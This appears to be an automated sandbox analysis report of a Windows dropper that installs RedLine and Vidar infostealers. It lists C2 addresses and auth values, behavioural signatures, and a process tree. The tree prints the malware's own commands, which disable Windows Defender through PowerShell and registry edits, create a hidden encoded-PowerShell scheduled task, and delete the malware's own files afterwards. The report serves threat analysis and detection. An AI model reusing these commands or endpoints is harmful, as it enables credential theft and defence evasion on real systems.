Analysis

  • max time kernel
    152s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    15-03-2022 14:12

General

  • Target

    f9e39563cee4f95eec4062daf6578d28f042bc7d9c59a0180c40865d48dc1bc5.exe

  • Size

    3.6MB

  • MD5

    ec9a8d1ba08d8b5b8c3ec2d27bbe081a

  • SHA1

    bfe1795805701810346382706106899a2da4b995

  • SHA256

    f9e39563cee4f95eec4062daf6578d28f042bc7d9c59a0180c40865d48dc1bc5

  • SHA512

    724ae398f062a54ba17a2ce418d40b9063698775d3ae5ae3d42555c4f502e12b3c5e54a23da052151ffca075b9b3a3f7a82882013dfb081fa04e723d3feb5a88

Malware Config

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

redline

Botnet

da da

C2

86.107.197.196:63065

Attributes
  • auth_value

    9b1654b30797c210c85bd0890936a5b9

Extracted

Family

vidar

Version

50.9

Botnet

1177

C2

https://ieji.de/@sam7al

https://busshi.moe/@sam0al

Attributes
  • profile_id

    1177

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

ruzki14_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    13b742acfe493b01c5301781c98d3fbe

Extracted

Family

redline

Botnet

nam11

C2

103.133.111.182:44839

Attributes
  • auth_value

    aa901213c47adf1c4bbe06384de2a9ab

Extracted

Family

redline

Botnet

ruz876

C2

185.215.113.7:5186

Attributes
  • auth_value

    4750f6742a496bbe74a981d51e7680ad

Extracted

Family

redline

Botnet

filinnn1

C2

5.45.77.29:2495

Attributes
  • auth_value

    da347df57c88b125ede510dbe7fcc0f4

Extracted

Family

redline

Botnet

GLO1503

C2

144.76.173.68:16125

Attributes
  • auth_value

    3338ae9cd5608d5f60db27601c9ac727

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 14 IoCs
  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 49 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 7 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 30 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 5 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 18 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f9e39563cee4f95eec4062daf6578d28f042bc7d9c59a0180c40865d48dc1bc5.exe
    "C:\Users\Admin\AppData\Local\Temp\f9e39563cee4f95eec4062daf6578d28f042bc7d9c59a0180c40865d48dc1bc5.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zSC765532D\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sotema_2.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_2.exe
          sotema_2.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:3972
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sotema_4.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4668
        • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_4.exe
          sotema_4.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4548
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:4404
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2168
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sotema_8.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4644
        • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_8.exe
          sotema_8.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3744
          • C:\Users\Admin\AppData\Local\Temp\is-6A56H.tmp\sotema_8.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-6A56H.tmp\sotema_8.tmp" /SL5="$8002E,161510,77824,C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_8.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2328
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sotema_7.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4592
        • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.exe
          sotema_7.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1668
          • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.exe
            C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.exe
            5⤵
            • Executes dropped EXE
            PID:2288
          • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.exe
            C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.exe
            5⤵
            • Executes dropped EXE
            PID:3636
          • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.exe
            C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:4524
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sotema_6.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4544
        • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_6.exe
          sotema_6.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2996
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sotema_5.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4556
        • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_5.exe
          sotema_5.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          PID:4356
          • C:\Users\Admin\Documents\2rBA8dAuXyAmzQtn9mgCshPq.exe
            "C:\Users\Admin\Documents\2rBA8dAuXyAmzQtn9mgCshPq.exe"
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Windows security modification
            • Checks whether UAC is enabled
            • Suspicious use of SetThreadContext
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • System policy modification
            PID:2220
            • C:\Users\Admin\AppData\Local\Temp\529621f6-42e9-441b-8608-d886211ba25f\AdvancedRun.exe
              "C:\Users\Admin\AppData\Local\Temp\529621f6-42e9-441b-8608-d886211ba25f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\529621f6-42e9-441b-8608-d886211ba25f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
              6⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious use of AdjustPrivilegeToken
              PID:3104
              • C:\Users\Admin\AppData\Local\Temp\529621f6-42e9-441b-8608-d886211ba25f\AdvancedRun.exe
                "C:\Users\Admin\AppData\Local\Temp\529621f6-42e9-441b-8608-d886211ba25f\AdvancedRun.exe" /SpecialRun 4101d8 3104
                7⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:5668
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\2rBA8dAuXyAmzQtn9mgCshPq.exe" -Force
              6⤵
                PID:5212
              • C:\Users\Admin\AppData\Local\Temp\529621f6-42e9-441b-8608-d886211ba25f\c29c2430-2204-4797-a88c-8321f3cd9587.exe
                "C:\Users\Admin\AppData\Local\Temp\529621f6-42e9-441b-8608-d886211ba25f\c29c2430-2204-4797-a88c-8321f3cd9587.exe" /o /c "Windows-Defender" /r
                6⤵
                • Executes dropped EXE
                PID:1816
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:5480
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\2rBA8dAuXyAmzQtn9mgCshPq.exe" -Force
                6⤵
                  PID:5604
                • C:\Users\Admin\Documents\2rBA8dAuXyAmzQtn9mgCshPq.exe
                  "C:\Users\Admin\Documents\2rBA8dAuXyAmzQtn9mgCshPq.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:5700
              • C:\Users\Admin\Documents\OqpiNV0ImVYLiMuxRZGTB2vL.exe
                "C:\Users\Admin\Documents\OqpiNV0ImVYLiMuxRZGTB2vL.exe"
                5⤵
                • Executes dropped EXE
                PID:2292
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 464
                  6⤵
                  • Program crash
                  PID:4680
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 472
                  6⤵
                  • Program crash
                  PID:3900
              • C:\Users\Admin\Documents\oPSbWsXkgXdQ3Fk7q_5UqmNf.exe
                "C:\Users\Admin\Documents\oPSbWsXkgXdQ3Fk7q_5UqmNf.exe"
                5⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Suspicious use of AdjustPrivilegeToken
                PID:3680
                • C:\Users\Admin\AppData\Local\Temp\9df12f3e-fdc0-414e-ac52-fb3ff350ba11.exe
                  "C:\Users\Admin\AppData\Local\Temp\9df12f3e-fdc0-414e-ac52-fb3ff350ba11.exe"
                  6⤵
                  • Executes dropped EXE
                  • Checks processor information in registry
                  PID:2864
              • C:\Users\Admin\Documents\LY_X7HZG_6WxabnGfswShGbw.exe
                "C:\Users\Admin\Documents\LY_X7HZG_6WxabnGfswShGbw.exe"
                5⤵
                • Executes dropped EXE
                PID:636
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 464
                  6⤵
                  • Program crash
                  PID:460
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 472
                  6⤵
                  • Program crash
                  PID:5440
              • C:\Users\Admin\Documents\gPnIrGdEmIlGjMMGwB6b3q_7.exe
                "C:\Users\Admin\Documents\gPnIrGdEmIlGjMMGwB6b3q_7.exe"
                5⤵
                  PID:1684
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1684 -s 432
                    6⤵
                    • Program crash
                    PID:840
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1684 -s 452
                    6⤵
                    • Program crash
                    PID:1696
                • C:\Users\Admin\Documents\c_fpRGxxqScd9HuZ5CBXKhEG.exe
                  "C:\Users\Admin\Documents\c_fpRGxxqScd9HuZ5CBXKhEG.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:1640
                • C:\Users\Admin\Documents\W5wFRtO6gsuXwrrHpoePIVQJ.exe
                  "C:\Users\Admin\Documents\W5wFRtO6gsuXwrrHpoePIVQJ.exe"
                  5⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Checks whether UAC is enabled
                  • Suspicious use of SetThreadContext
                  PID:1372
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    6⤵
                      PID:1704
                  • C:\Users\Admin\Documents\eXbT0W2MPAARY5Fv6JK0MsPO.exe
                    "C:\Users\Admin\Documents\eXbT0W2MPAARY5Fv6JK0MsPO.exe"
                    5⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks whether UAC is enabled
                    • Suspicious use of SetThreadContext
                    PID:2732
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                      6⤵
                        PID:4788
                    • C:\Users\Admin\Documents\fT5wdSpTHJlSRyNB_tbz_Hd9.exe
                      "C:\Users\Admin\Documents\fT5wdSpTHJlSRyNB_tbz_Hd9.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Adds Run key to start application
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2208
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c timeout 45
                        6⤵
                          PID:4716
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout 45
                            7⤵
                            • Delays execution with timeout.exe
                            PID:3560
                        • C:\Users\Admin\AppData\Local\Temp\Ztfglzprim.exe
                          "C:\Users\Admin\AppData\Local\Temp\Ztfglzprim.exe"
                          6⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:5924
                        • C:\Users\Admin\Documents\fT5wdSpTHJlSRyNB_tbz_Hd9.exe
                          C:\Users\Admin\Documents\fT5wdSpTHJlSRyNB_tbz_Hd9.exe
                          6⤵
                          • Executes dropped EXE
                          PID:4332
                      • C:\Users\Admin\Documents\yPKqgFGvWUyeuqkKREO1ZW8C.exe
                        "C:\Users\Admin\Documents\yPKqgFGvWUyeuqkKREO1ZW8C.exe"
                        5⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:4528
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im yPKqgFGvWUyeuqkKREO1ZW8C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\yPKqgFGvWUyeuqkKREO1ZW8C.exe" & del C:\ProgramData\*.dll & exit
                          6⤵
                            PID:5372
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im yPKqgFGvWUyeuqkKREO1ZW8C.exe /f
                              7⤵
                              • Kills process with taskkill
                              PID:3704
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 6
                              7⤵
                              • Delays execution with timeout.exe
                              PID:2628
                        • C:\Users\Admin\Documents\iBGXpMjOgKW0vNdQ2iw_MQKt.exe
                          "C:\Users\Admin\Documents\iBGXpMjOgKW0vNdQ2iw_MQKt.exe"
                          5⤵
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of SetThreadContext
                          PID:5100
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                            6⤵
                              PID:4376
                          • C:\Users\Admin\Documents\HhpexB0qJdTdmk3etEjUazpV.exe
                            "C:\Users\Admin\Documents\HhpexB0qJdTdmk3etEjUazpV.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5108
                          • C:\Users\Admin\Documents\gKEMpGpZa2MO5bI287flZedT.exe
                            "C:\Users\Admin\Documents\gKEMpGpZa2MO5bI287flZedT.exe"
                            5⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            PID:5000
                            • C:\Windows\SysWOW64\svchost.exe
                              "C:\Windows\System32\svchost.exe"
                              6⤵
                                PID:1756
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
                                6⤵
                                  PID:1888
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd
                                    7⤵
                                      PID:5924
                                      • C:\Windows\SysWOW64\tasklist.exe
                                        tasklist /FI "imagename eq BullGuardCore.exe"
                                        8⤵
                                        • Enumerates processes with tasklist
                                        PID:3968
                                      • C:\Windows\SysWOW64\find.exe
                                        find /I /N "bullguardcore.exe"
                                        8⤵
                                          PID:5140
                                        • C:\Windows\SysWOW64\tasklist.exe
                                          tasklist /FI "imagename eq PSUAService.exe"
                                          8⤵
                                          • Enumerates processes with tasklist
                                          PID:5132
                                        • C:\Windows\SysWOW64\find.exe
                                          find /I /N "psuaservice.exe"
                                          8⤵
                                            PID:1892
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
                                            8⤵
                                              PID:3016
                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                              Sta.exe.pif V
                                              8⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of SetThreadContext
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:1360
                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                9⤵
                                                • Executes dropped EXE
                                                PID:5364
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 448
                                                  10⤵
                                                  • Program crash
                                                  PID:2384
                                      • C:\Users\Admin\Documents\Ml01dnFE8sQgIZhAtiZedgIK.exe
                                        "C:\Users\Admin\Documents\Ml01dnFE8sQgIZhAtiZedgIK.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        PID:5084
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 624
                                          6⤵
                                          • Program crash
                                          PID:2384
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 664
                                          6⤵
                                          • Program crash
                                          PID:5156
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 672
                                          6⤵
                                          • Program crash
                                          PID:5124
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 812
                                          6⤵
                                          • Program crash
                                          PID:2556
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1224
                                          6⤵
                                          • Program crash
                                          PID:5232
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1288
                                          6⤵
                                          • Program crash
                                          PID:4148
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1296
                                          6⤵
                                          • Program crash
                                          PID:4460
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1292
                                          6⤵
                                          • Program crash
                                          PID:5368
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "Ml01dnFE8sQgIZhAtiZedgIK.exe" /f & erase "C:\Users\Admin\Documents\Ml01dnFE8sQgIZhAtiZedgIK.exe" & exit
                                          6⤵
                                            PID:5560
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im "Ml01dnFE8sQgIZhAtiZedgIK.exe" /f
                                              7⤵
                                              • Kills process with taskkill
                                              PID:5332
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1104
                                            6⤵
                                            • Program crash
                                            PID:528
                                        • C:\Users\Admin\Documents\QjCiHc3cmwNBVrFMKHZSCJzD.exe
                                          "C:\Users\Admin\Documents\QjCiHc3cmwNBVrFMKHZSCJzD.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1788
                                          • C:\Users\Admin\Documents\QjCiHc3cmwNBVrFMKHZSCJzD.exe
                                            "C:\Users\Admin\Documents\QjCiHc3cmwNBVrFMKHZSCJzD.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:1404
                                        • C:\Users\Admin\Documents\QrvlhCbR0IHsy_Blr2TDK3dn.exe
                                          "C:\Users\Admin\Documents\QrvlhCbR0IHsy_Blr2TDK3dn.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:3216
                                          • C:\Users\Admin\AppData\Local\Temp\7zSA0A2.tmp\Install.exe
                                            .\Install.exe
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5172
                                            • C:\Users\Admin\AppData\Local\Temp\7zSC91A.tmp\Install.exe
                                              .\Install.exe /S /site_id "525403"
                                              7⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Checks computer location settings
                                              • Drops file in System32 directory
                                              • Enumerates system info in registry
                                              PID:5496
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                8⤵
                                                  PID:4696
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                    9⤵
                                                      PID:5224
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                        10⤵
                                                          PID:5156
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                          10⤵
                                                            PID:3020
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                        8⤵
                                                          PID:5140
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            9⤵
                                                            • Executes dropped EXE
                                                            PID:1684
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                            9⤵
                                                              PID:3412
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                10⤵
                                                                  PID:4172
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                  10⤵
                                                                    PID:3304
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "gMepDITMS" /SC once /ST 03:52:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                8⤵
                                                                • Creates scheduled task(s)
                                                                PID:4676
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /run /I /tn "gMepDITMS"
                                                                8⤵
                                                                  PID:3808
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /DELETE /F /TN "gMepDITMS"
                                                                  8⤵
                                                                    PID:3540
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 14:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\UMyAYFP.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                    8⤵
                                                                    • Drops file in Windows directory
                                                                    • Creates scheduled task(s)
                                                                    PID:3388
                                                            • C:\Users\Admin\Documents\3g0IgBY60ub3CvBAsgc379yk.exe
                                                              "C:\Users\Admin\Documents\3g0IgBY60ub3CvBAsgc379yk.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Checks computer location settings
                                                              • Loads dropped DLL
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Checks processor information in registry
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:4956
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 3g0IgBY60ub3CvBAsgc379yk.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\3g0IgBY60ub3CvBAsgc379yk.exe" & del C:\ProgramData\*.dll & exit
                                                                6⤵
                                                                  PID:4740
